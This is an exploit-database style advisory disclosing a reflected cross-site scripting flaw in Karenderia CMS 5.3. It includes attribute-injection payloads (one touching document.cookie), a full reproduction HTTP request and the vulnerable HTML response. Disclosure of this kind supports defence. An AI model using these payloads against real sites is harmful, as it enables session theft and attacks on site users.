Karenderia CMS 5.3 Cross Site Scripting

2019.07.09

Credit: Sisyshell

Risk: Low

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-79

# Exploit Title: Karenderia CMS 5.3 - Reflected Cross site scripting
# Dork: N/A
# Date: 09-07-2019
# Exploit Author: Sisyshell
# Vendor Homepage: buyer2@codemywebapps.com
# Software Link:
https://codecanyon.net/item/karenderia-multiple-restaurant-system/9118694
# Version: v5.3
# Category: Webapps
# Tested on: Windows
# CVE: N/A
Description
---------------
Reflected XSS via 's' param at
/searcharea?s=" onmouseover="console.log(document.cookie);"
Payload: " onmouseover="console.log(document.cookie);"
Browser: Firefox 67
Date Observed: 9 July 2019
Reproduction GET
----------------
GET http://bastisapp.com/kmrs/searcharea?s="+onmouseout="alert(1);" HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Cache-Control: no-cache
Connection: keep-alive
Cookie: PHPSESSID=94kt2rgji1ir1fd1lnlha4m0q0;
YII_CSRF_TOKEN=a2a652784b4e1f917ad08aba59a875be88c97873;
kr_search_address=%22+onmouseout%3D%22alert%281%29%3B%22;
client_location=%7B%22lat%22%3A0%2C%22long%22%3A0%7D
DNT: 1
Host: [domain].com
Pragma: no-cache
Referer: http://[domain].com/kmrs/
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0)
Gecko/20100101 Firefox/67.0
Reproduction Response
---------------------
<div class="col-md-6 col-xs-6 border">
<a href="/kmrs/searcharea?s="
onmouseover="console.log(document.cookie);" &display_type="listview&quot;"
class="display-type orange-button block center rounded "
data-type="listview"> <i class="fa fa-th-list"></i> </a>
<a href="/kmrs/searcharea?s="
onmouseover="console.log(document.cookie);" &display_type="gridview&quot;"
class="display-type orange-button block center rounded mr10px inactive"
data-type="gridview"> <i class="fa fa-th-large"></i> </a>
<a href="javascript:;" id="mobile-filter-handle" class="orange-button
block center rounded mr10px"> <i class="fa fa-filter"></i> </a>
<a href="javascript:;" id="mobile-viewmap-handle" class="orange-button
block center rounded mr10px"> <i class="ion-ios-location"></i> </a>
<div class="clear"></div>
</div>

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Karenderia CMS 5.3 Cross Site Scripting

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.